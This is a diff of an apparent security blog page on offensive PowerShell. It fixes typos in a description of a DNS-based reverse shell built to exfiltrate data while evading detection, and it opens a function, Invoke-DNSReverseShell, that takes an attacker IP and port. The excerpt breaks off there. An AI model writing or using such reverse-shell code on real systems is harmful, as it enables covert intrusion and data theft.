BenjiTrapp/benjitrapp.github.io/_attacks/2024-01-04-offensive-powershell.md

 ### DNS-Based PowerShell Reverse Shell

-This script uses DNS requests to exltrate data, making the reverse shell trac appear as DNS queries, which can be less suspicious and harder to detect.
+This script uses DNS requests to exfiltrate data, making the reverse shell track appear as DNS queries, which can be less suspicious and harder to detect.

 ```powershell
 function Invoke-DNSReverseShell { param([string]$attacker_ip, [int]$attacker_port) $client = New-Object